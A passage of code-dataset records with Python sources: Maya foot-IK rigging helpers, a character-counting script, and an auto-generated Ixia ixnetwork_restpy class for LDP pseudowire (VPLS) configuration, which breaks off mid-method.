ctl:\n 
cmds.hide(ctl)\n\n    # Show specific controls\n    show_strings = ['RollToesEnd']\n    for ctl in ctls_to_hide:\n        for show_str in show_strings:\n            if show_str in ctl:\n                cmds.showHidden(ctl)\n\n\n    LOG.info('Successfully modified footIK pivot controls on {}'.format(footIK_ctl))\n\n\ndef add_heel_pivot_node(foot_ik_ctl):\n    \"\"\"Adds a pivot transform at the heel of the foot\n\n    Example:\n        add_heel_pivot_node('IKLeg_L')\n    \"\"\"\n    # Create new transform\n    cmds.select(clear=True)\n    heel_pivot = cmds.group(name='{}_heel_pivot'.format(foot_ik_ctl), empty=True)\n\n    if 'Front' in foot_ik_ctl:\n        match_pivot = return_foot_node(foot_ik_ctl, search_str='RollOffsetfrontHeel_')\n    elif 'Back' in foot_ik_ctl:\n        match_pivot = return_foot_node(foot_ik_ctl, search_str='RollOffsetbackHeel_')\n    else:\n        match_pivot = return_foot_node(foot_ik_ctl, search_str='RollOffsetHeel_')\n\n    cmds.delete(cmds.pointConstraint(match_pivot, heel_pivot))\n    ik_child = cmds.listRelatives(foot_ik_ctl, children=True, type='transform')\n    cmds.parent(heel_pivot, foot_ik_ctl)\n    cmds.parent(ik_child, heel_pivot)\n    return heel_pivot\n\n\ndef add_ball_pivot_node(foot_ik_ctl):\n    \"\"\"Adds a pivot transform at the ball of the foot\n\n    Example:\n        add_ball_pivot_node('IKLeg_L')\n    \"\"\"\n    # Create new transform\n    cmds.select(clear=True)\n    ball_pivot = cmds.group(name='{}_ball_pivot'.format(foot_ik_ctl), empty=True)\n    inner_pivot = return_foot_node(foot_ik_ctl, search_str='RockInnerPivot_')\n    outer_pivot = return_foot_node(foot_ik_ctl, search_str='RockOuterPivot_')\n    cmds.delete(cmds.pointConstraint(inner_pivot, outer_pivot, ball_pivot))\n    ik_child = cmds.listRelatives(foot_ik_ctl, children=True, type='transform')\n    cmds.parent(ball_pivot, foot_ik_ctl)\n    cmds.parent(ik_child, ball_pivot)\n    return ball_pivot\n\n\ndef return_foot_node(foot_ik_ctl, search_str=\"\"):\n    \"\"\"Simple helper to find foot nodes in a footIK ctl hierarchy\n\n    Example:\n        return_foot_node('IKLeg_L', search_str='IKToes_')\n    \"\"\"\n    foot_nodes = cmds.listRelatives(foot_ik_ctl, ad=True, type='transform')\n    for foot_node in foot_nodes:\n        if search_str in foot_node:\n            return foot_node\n\n\ndef attributeSeparator(control, attr):\n    \"\"\"Create a separator attribute on the specified control object\n\n    Args:\n        control: The control to add the separator attribute to\n        attr: The separator attribute name\n\n    Returns:\n        string: control.attr\n\n    Example:\n        attributeSeparator('Lf_arm_ctrl', '___')\n    \"\"\"\n    # Check control\n    if not cmds.objExists(control):\n        raise Exception('Control object \"' + control + '\" does not exist!')\n\n    # Check attribute\n    if cmds.objExists(control + '.' + attr):\n        raise Exception('Control attribute \"' + control + '.' + attr + '\" already exists!')\n\n    # Create attribute\n    cmds.addAttr(control, ln=attr, at='enum', en=':-:')\n    cmds.setAttr(control + '.' + attr, cb=True)\n    cmds.setAttr(control + '.' + attr, l=True)\n\n    # Return result\n    return (control + '.' 
+ attr)","sub_path":"src/maya_toolkit/dragonfly/plugins/as_modifyFootIK.task/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"348984166","text":"import pprint\n\nmessage = input('Please type any message here, the longer the better!\\n')\ncount = {}\n\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\n\n#print(pprint.pformat(count))\npprint.pprint(count)\n","sub_path":"count-characters.py","file_name":"count-characters.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510559536","text":"# MIT LICENSE\n#\n# Copyright 1997 - 2020 by IXIA Keysight\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\nimport sys\nfrom ixnetwork_restpy.base import Base\nfrom ixnetwork_restpy.files import Files\n\nif sys.version_info >= (3, 5):\n from typing import List, Any, Union\n\n\nclass Ldppwvpls(Base):\n \"\"\"LDP FEC128 Configuration\n The Ldppwvpls class encapsulates a list of ldppwvpls resources that are managed by the user.\n A list of resources can be retrieved from the server using the Ldppwvpls.find() method.\n The list can be managed by using the Ldppwvpls.add() and Ldppwvpls.remove() methods.\n \"\"\"\n\n __slots__ = ()\n _SDM_NAME = \"ldppwvpls\"\n _SDM_ATT_MAP = {\n \"Active\": \"active\",\n \"AutoPeerID\": \"autoPeerID\",\n \"AutoPeerId\": \"autoPeerId\",\n \"BfdPwCV\": \"bfdPwCV\",\n \"BfdUdpCV\": \"bfdUdpCV\",\n \"CBitEnabled\": \"cBitEnabled\",\n \"ConnectedVia\": \"connectedVia\",\n \"Count\": \"count\",\n \"DescEnabled\": \"descEnabled\",\n \"Description\": \"description\",\n \"DescriptiveName\": \"descriptiveName\",\n \"DownInterval\": \"downInterval\",\n \"DownStart\": \"downStart\",\n \"EnableCCCVNegotiation\": \"enableCCCVNegotiation\",\n \"EnablePWStatus\": \"enablePWStatus\",\n \"Errors\": \"errors\",\n \"GroupId\": \"groupId\",\n \"InterfaceType\": \"interfaceType\",\n \"Ipv6PeerId\": \"ipv6PeerId\",\n \"LSPPingCV\": \"lSPPingCV\",\n \"Label\": \"label\",\n \"LocalRouterID\": \"localRouterID\",\n \"Mtu\": \"mtu\",\n \"Multiplier\": \"multiplier\",\n \"Name\": \"name\",\n \"PWACHCC\": \"pWACHCC\",\n \"PWStatusCode\": \"pWStatusCode\",\n \"PeerId\": \"peerId\",\n \"PwStatusSendNotification\": \"pwStatusSendNotification\",\n \"RepeatCount\": \"repeatCount\",\n \"RouterAlertCC\": \"routerAlertCC\",\n 
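# Remaining entries map read-only session state plus the PW status-toggle timing and VC ID start.\n        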
\"SessionStatus\": \"sessionStatus\",\n \"StackedLayers\": \"stackedLayers\",\n \"StateCounts\": \"stateCounts\",\n \"Status\": \"status\",\n \"UpInterval\": \"upInterval\",\n \"VCIDStart\": \"vCIDStart\",\n }\n _SDM_ENUM_MAP = {\n \"status\": [\n \"configured\",\n \"error\",\n \"mixed\",\n \"notStarted\",\n \"started\",\n \"starting\",\n \"stopping\",\n ],\n }\n\n def __init__(self, parent, list_op=False):\n super(Ldppwvpls, self).__init__(parent, list_op)\n\n @property\n def Connector(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import (\n Connector,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Connector\", None) is not None:\n return self._properties.get(\"Connector\")\n return Connector(self)\n\n @property\n def Ethernet(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ethernet_18677f1f170027c217563a3250b1f635.Ethernet): An instance of the Ethernet class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ethernet_18677f1f170027c217563a3250b1f635 import (\n Ethernet,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Ethernet\", None) is not None:\n return self._properties.get(\"Ethernet\")\n return Ethernet(self)\n\n @property\n def Ipv4Loopback(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv4loopback_f84286c6e2c90f5267670278dde3f258.Ipv4Loopback): An instance of the Ipv4Loopback class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv4loopback_f84286c6e2c90f5267670278dde3f258 import (\n Ipv4Loopback,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Ipv4Loopback\", None) is not None:\n return self._properties.get(\"Ipv4Loopback\")\n return Ipv4Loopback(self)\n\n @property\n def Ipv6Loopback(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv6loopback_c5557054afff2b9cc84b7676de50b805.Ipv6Loopback): An instance of the Ipv6Loopback class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ipv6loopback_c5557054afff2b9cc84b7676de50b805 import (\n Ipv6Loopback,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Ipv6Loopback\", None) is not None:\n return self._properties.get(\"Ipv6Loopback\")\n return Ipv6Loopback(self)\n\n @property\n def LdpBasicRouter(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouter_53e2de40003674322c811a1ba519dbb6.LdpBasicRouter): An instance of the LdpBasicRouter class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouter_53e2de40003674322c811a1ba519dbb6 import (\n LdpBasicRouter,\n )\n\n if 
len(self._object_properties) > 0:\n if self._properties.get(\"LdpBasicRouter\", None) is not None:\n return self._properties.get(\"LdpBasicRouter\")\n return LdpBasicRouter(self)\n\n @property\n def LdpBasicRouterV6(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouterv6_b554f464616f39033d7acad4846e556c.LdpBasicRouterV6): An instance of the LdpBasicRouterV6 class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldpbasicrouterv6_b554f464616f39033d7acad4846e556c import (\n LdpBasicRouterV6,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpBasicRouterV6\", None) is not None:\n return self._properties.get(\"LdpBasicRouterV6\")\n return LdpBasicRouterV6(self)\n\n @property\n def LdpTargetedRouter(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouter_85c7a9993d80996c22a9dbd739df9692.LdpTargetedRouter): An instance of the LdpTargetedRouter class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouter_85c7a9993d80996c22a9dbd739df9692 import (\n LdpTargetedRouter,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpTargetedRouter\", None) is not None:\n return self._properties.get(\"LdpTargetedRouter\")\n return LdpTargetedRouter(self)\n\n @property\n def LdpTargetedRouterV6(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouterv6_e86e77f17dfccefac9e15769756089cf.LdpTargetedRouterV6): An instance of the LdpTargetedRouterV6 class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ldptargetedrouterv6_e86e77f17dfccefac9e15769756089cf import (\n LdpTargetedRouterV6,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"LdpTargetedRouterV6\", None) is not None:\n return self._properties.get(\"LdpTargetedRouterV6\")\n return LdpTargetedRouterV6(self)\n\n @property\n def Mpls(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.mpls_ffaab24246ff53741a201b0a48e8e3f1.Mpls): An instance of the Mpls class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.mpls_ffaab24246ff53741a201b0a48e8e3f1 import (\n Mpls,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Mpls\", None) is not None:\n return self._properties.get(\"Mpls\")\n return Mpls(self)\n\n @property\n def Tag(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d.Tag): An instance of the Tag class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d import (\n Tag,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Tag\", None) is not None:\n return self._properties.get(\"Tag\")\n return Tag(self)\n\n @property\n def Active(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n 
-------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Activate/Deactivate Configuration\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Active\"]))\n\n @property\n def AutoPeerID(self):\n # type: () -> 'Multivalue'\n \"\"\"DEPRECATED\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"AutoPeerID\"]))\n\n @property\n def AutoPeerId(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n - bool: If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"AutoPeerId\"])\n\n @AutoPeerId.setter\n def AutoPeerId(self, value):\n # type: (bool) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"AutoPeerId\"], value)\n\n @property\n def BfdPwCV(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): BFD PW-ACH CV\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"BfdPwCV\"]))\n\n @property\n def BfdUdpCV(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): BFD IP/UDP CV\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"BfdUdpCV\"]))\n\n @property\n def CBitEnabled(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, sets the C-Bit (flag). It is the highest order bit in the VC Type field. If the bit is set, it indicates the presence of a control word on this VC.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"CBitEnabled\"]))\n\n @property\n def ConnectedVia(self):\n # type: () -> List[str]\n \"\"\"DEPRECATED\n Returns\n -------\n - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of layers this layer is used to connect with to the wire.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"])\n\n @ConnectedVia.setter\n def ConnectedVia(self, value):\n # type: (List[str]) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"], value)\n\n @property\n def Count(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Count\"])\n\n @property\n def DescEnabled(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, indicates that an optional Interface Description is present\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"DescEnabled\"]))\n\n @property\n def Description(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): An optional user-defined Interface Description. It may be used with ALL VC types. 
Valid length is 0 to 80 octets\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Description\"]))\n\n @property\n def DescriptiveName(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"DescriptiveName\"])\n\n @property\n def DownInterval(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Time interval for which the PW status will remain down\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"DownInterval\"]))\n\n @property\n def DownStart(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The duration in time after session becomes up and a notification message being sent to make the session down\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"DownStart\"]))\n\n @property\n def EnableCCCVNegotiation(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, indicates that CCCV Negotiation is enabled\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"EnableCCCVNegotiation\"])\n )\n\n @property\n def EnablePWStatus(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, this enables the use of PW Status TLV in notification messages to notify the PW status\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"EnablePWStatus\"])\n )\n\n @property\n def Errors(self):\n \"\"\"\n Returns\n -------\n - list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str])): A list of errors that have occurred\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Errors\"])\n\n @property\n def GroupId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): A user-defined 32-bit value used to identify a group of VCs\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"GroupId\"]))\n\n @property\n def InterfaceType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 15-bit VC Type used in the VC FEC element.It depends on the Layer 2 protocol used on the interface\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"InterfaceType\"]))\n\n @property\n def Ipv6PeerId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 128-bit IPv6 address of the LDP Peer.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Ipv6PeerId\"]))\n\n @property\n def LSPPingCV(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): LSP Ping CV\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n 
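# The Multivalue wrapper supports per-device value patterns,\n        # e.g. mv.Single('1') or mv.Increment(start_value='1', step_value='1').\n        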
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"LSPPingCV\"]))\n\n @property\n def Label(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Label\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Label\"]))\n\n @property\n def LocalRouterID(self):\n # type: () -> List[str]\n \"\"\"\n Returns\n -------\n - list(str): Router ID\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LocalRouterID\"])\n\n @property\n def Mtu(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 2-octet value for the maximum Transmission Unit (MTU).\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Mtu\"]))\n\n @property\n def Multiplier(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of layer instances per parent instance (multiplier)\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Multiplier\"])\n\n @Multiplier.setter\n def Multiplier(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Multiplier\"], value)\n\n @property\n def Name(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Name of NGPF element, guaranteed to be unique in Scenario\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Name\"])\n\n @Name.setter\n def Name(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Name\"], value)\n\n @property\n def PWACHCC(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): PW-ACH CC\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"PWACHCC\"]))\n\n @property\n def PWStatusCode(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): PW Status Code to be sent when to transition to down state if PW Status Send Notification is enabled\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"PWStatusCode\"]))\n\n @property\n def PeerId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The 32-bit IPv4 address of the LDP Peer.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"PeerId\"]))\n\n @property\n def PwStatusSendNotification(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): If selected, it signifies whether to send a notification message with a PW status for the corresponding PW\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"PwStatusSendNotification\"])\n )\n\n @property\n def RepeatCount(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The number of times to repeat the Up/Down status of the PW. 
'0' means keep toggling the Up/Down state indefinitely.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RepeatCount\"]))\n\n    @property\n    def RouterAlertCC(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): Router Alert CC\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RouterAlertCC\"]))\n\n    @property\n    def SessionStatus(self):\n        # type: () -> List[str]\n        \"\"\"\n        Returns\n        -------\n        - list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"SessionStatus\"])\n\n    @property\n    def StackedLayers(self):\n        # type: () -> List[str]\n        \"\"\"\n        Returns\n        -------\n        - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of secondary (many to one) child layer protocols\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"StackedLayers\"])\n\n    @StackedLayers.setter\n    def StackedLayers(self, value):\n        # type: (List[str]) -> None\n        self._set_attribute(self._SDM_ATT_MAP[\"StackedLayers\"], value)\n\n    @property\n    def StateCounts(self):\n        \"\"\"\n        Returns\n        -------\n        - dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"StateCounts\"])\n\n    @property\n    def Status(self):\n        # type: () -> str\n        \"\"\"\n        Returns\n        -------\n        - str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. 
Once in Started state, protocol sessions will begin to negotiate.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Status\"])\n\n @property\n def UpInterval(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Time Interval for which the PW status will remain in Up state before transitioning again to Down state.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"UpInterval\"]))\n\n @property\n def VCIDStart(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The value of the VC ID\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"VCIDStart\"]))\n\n def update(\n self,\n AutoPeerId=None,\n ConnectedVia=None,\n Multiplier=None,\n Name=None,\n StackedLayers=None,\n ):\n # type: (bool, List[str], int, str, List[str]) -> Ldppwvpls\n \"\"\"Updates ldppwvpls resource on the server.\n\n This method has some named parameters with a type: obj (Multivalue).\n The Multivalue class has documentation that details the possible values for those named parameters.\n\n Args\n ----\n - AutoPeerId (bool): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def add(\n self,\n AutoPeerId=None,\n ConnectedVia=None,\n Multiplier=None,\n Name=None,\n StackedLayers=None,\n ):\n # type: (bool, List[str], int, str, List[str]) -> Ldppwvpls\n \"\"\"Adds a new ldppwvpls resource on the server and adds it to the container.\n\n Args\n ----\n - AutoPeerId (bool): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Returns\n -------\n - self: This instance with all currently retrieved ldppwvpls resources using find and the newly added ldppwvpls resources available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def remove(self):\n \"\"\"Deletes all the contained ldppwvpls resources in this instance from the server.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n self._delete()\n\n def find(\n self,\n AutoPeerId=None,\n ConnectedVia=None,\n Count=None,\n DescriptiveName=None,\n 
